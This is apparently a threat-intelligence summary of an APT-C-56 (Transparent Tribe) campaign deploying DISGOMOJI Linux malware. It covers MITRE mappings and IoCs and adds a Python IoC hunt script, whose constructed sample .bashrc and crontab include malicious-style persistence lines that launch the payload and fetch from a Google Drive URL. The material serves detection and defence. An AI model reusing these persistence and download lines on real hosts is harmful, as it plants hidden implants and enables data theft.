APT-C-56, also known as Transparent Tribe, has been observed deploying a Golang-based ELF malware variant called DISGOMOJI that uses Google Drive and Google Cloud Platform for C2 communications and data exfiltration. The group targets Indian government and military personnel with sophisticated multi-stage attacks involving persistence mechanisms and credential theft. #APT-C-56 #DISGOMOJI #GoogleCloudPlatform
Keypoints
- APT-C-56 (Transparent Tribe) is a South Asia-based APT group focusing on India and neighboring countries, specializing in targeted spear-phishing attacks.
- The group uses a multi-stage attack chain deploying a Golang-based ELF malware variant named DISGOMOJI that communicates via Google Drive and Google Cloud Platform.
- The initial infection method involves a password-protected zip file containing an encrypted PDF and a “Password” ELF file that downloads and decrypts subsequent payloads.
- The malware establishes persistence by modifying the victim’s .bashrc file and scheduling periodic execution via cron jobs.
- The final payload, x96coreinfo, steals Firefox passwords using the open-source firefox_decrypt tool and exfiltrates various document and image files to attacker-controlled Google Cloud storage.
- Attackers deploy a malicious Firefox extension and install MeshAgent remote management software for long-term control.
- This campaign reflects continuous malware evolution with the use of cloud services for stealthy command and control and demonstrates high fault tolerance in the attack chain.
MITRE Techniques
- [T1566] Phishing – Inducing users to execute a file named “Password” inside a zipped archive to initiate infection (“users are induced to execute a file named password … that displays a decoy document password while downloading subsequent components”).
- [T1543] Create or Modify System Process – Modifying the .bashrc file and scheduling cron jobs for persistence (“writing configuration commands to ‘.bashrc’ and adding a cron job to ensure execution”).
- [T1105] Ingress Tool Transfer – Downloading subsequent payloads from Google Drive URLs (“downloading ‘x96coreinfo’, ‘ec’, and other files from specific Google Drive public addresses”).
- [T1027] Obfuscated Files or Information – Use of encrypted intermediate files and multiple layers of encryption with RC4 and AES (“‘ec’ file used to decrypt ‘intermediate’ and ‘x96coreinfo’ using RC4 and AES algorithms”).
- [T1059] Command and Scripting Interpreter – Execution of Java JAR files and shell scripts to facilitate payload deployment (“executing ‘x96-dependencies.jar’ with ‘java -jar’ command and shell scripts for downloading and launching malware”).
- [T1083] File and Directory Discovery – Collecting files with specific extensions from the working directory for exfiltration (“stealing files with extensions such as .doc, .pdf, .xls, .jpg from the current working directory”).
- [T1113] Screen Capture – Implicitly suggested via browser monitoring to steal session cookies and user UUIDs (“monitoring visits to sites like https://email.gov.in and stealing cookies and uuid”).
- [T1021] Remote Services – Installing MeshAgent remote management tool for ongoing control (“installing MeshAgent via script hosted on remote domain”).
Indicators of Compromise
- [MD5 hashes] Samples of malware and related files including Protected_Document.zip (452cd18570471e80dd6bf34addede334), Password ELF (d5a3766e744a563278b18267d6bd7113), decryption tool ec (c763ecf315481525afcd47c5f32c1fd7), and final payload x96coreinfo (c8c21b4642f12c28f6e5e0389bbf8c36) among others.
- [Domains/URLs] Command and control cloud storage and script download URLs hosted on Google Drive (e.g., drive.google.com/uc?export=download&id=1ZreMbUude-F2zLWWeO2FNiKU7I7v7aSe) and remote script hosts such as saadac3.accesscam.org for MeshAgent deployment.
- [File Names] Key malware components include “Password” (ELF executable), “x96coreinfo” (final payload ELF), “ec” (encryption/decryption ELF), and “x96-dependencies.jar” (Java archive downloader).
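A small hunt script, added here as an example and not part of the original report or of any vendor tooling, that turns the indicators above into checks a defender can run on a Linux host: it hashes files against the listed MD5 values, flags files whose names match the named components, and scans .bashrc and crontab lines for references to those components or to the listed download hosts (the persistence and ingress techniques described under T1543 and T1105). The sample .bashrc and crontab contents are constructed for this example, as is the PLACEHOLDER_FILE_ID in the Google Drive URL; the function and variable names are this example's own.

```python
import hashlib
import re
from pathlib import Path

# IoC values as listed in the report above (MD5 hashes, component names, hosts).
IOC_MD5 = {
    "452cd18570471e80dd6bf34addede334": "Protected_Document.zip",
    "d5a3766e744a563278b18267d6bd7113": "Password (ELF)",
    "c763ecf315481525afcd47c5f32c1fd7": "ec (decryption tool)",
    "c8c21b4642f12c28f6e5e0389bbf8c36": "x96coreinfo (final payload)",
}
IOC_NAMES = ["Password", "x96coreinfo", "ec", "x96-dependencies.jar", "intermediate"]
IOC_HOSTS = ["drive.google.com/uc?export=download", "saadac3.accesscam.org"]

# Match a component name only as a whole token / path element, so that a short
# name such as "ec" does not fire inside words like "echo" or "second".
_NAME_RE = re.compile(
    r"(?<![\w.-])(?:" + "|".join(re.escape(n) for n in IOC_NAMES) + r")(?![\w.-])"
)


def lookup_md5(md5_hex):
    """Return the IoC label for a known MD5 (case-insensitive), or None."""
    return IOC_MD5.get(md5_hex.lower())


def scan_persistence_lines(lines, source):
    """Flag .bashrc or crontab lines that reference a known component or host.

    Returns one hit dict per (line, indicator); blank lines and comments are skipped.
    """
    hits = []
    for lineno, line in enumerate(lines, start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indicators = [m.group(0) for m in _NAME_RE.finditer(stripped)]
        indicators += [h for h in IOC_HOSTS if h in stripped]
        for ind in indicators:
            hits.append({"source": source, "line": lineno, "indicator": ind, "text": stripped})
    return hits


def check_files(files):
    """files maps path -> bytes. Flag MD5 matches (high confidence) and
    file-name matches (lower confidence, worth a manual look)."""
    findings = []
    for path, data in files.items():
        digest = hashlib.md5(data).hexdigest()
        label = lookup_md5(digest)
        if label:
            findings.append({"path": path, "md5": digest, "reason": "md5", "label": label})
        elif Path(path).name in IOC_NAMES:
            findings.append({"path": path, "md5": digest, "reason": "name", "label": Path(path).name})
    return findings


def scan_directory(root):
    """Hash every regular file under root and run check_files on the result."""
    files = {str(p): p.read_bytes() for p in Path(root).rglob("*") if p.is_file()}
    return check_files(files)


# Constructed sample inputs (not from the report): a .bashrc and a crontab whose
# suspicious entries were written by hand to mirror the described persistence.
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH=$PATH:$HOME/bin
alias ll='ls -la'
nohup $HOME/.x96/x96coreinfo >/dev/null 2>&1 &
"""
SAMPLE_CRONTAB = """\
*/5 * * * * /home/user/.x96/x96coreinfo
0 3 * * * /usr/bin/backup.sh
@reboot /home/user/.x96/ec "https://drive.google.com/uc?export=download&id=PLACEHOLDER_FILE_ID"
"""

if __name__ == "__main__":
    for h in scan_persistence_lines(SAMPLE_BASHRC.splitlines(), ".bashrc"):
        print(h)
    for h in scan_persistence_lines(SAMPLE_CRONTAB.splitlines(), "crontab"):
        print(h)
    print(check_files({"/home/user/.x96/x96coreinfo": b"constructed placeholder bytes"}))
```

On a live host, feed `scan_persistence_lines` the contents of each user's `~/.bashrc`, the per-user crontabs and `/etc/cron.*`, and point `scan_directory` at home directories; a name-only hit is a prompt to inspect the file, while an MD5 hit against the listed hashes is a confirmed sample.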
Read more: https://www.ctfiot.com/253976.html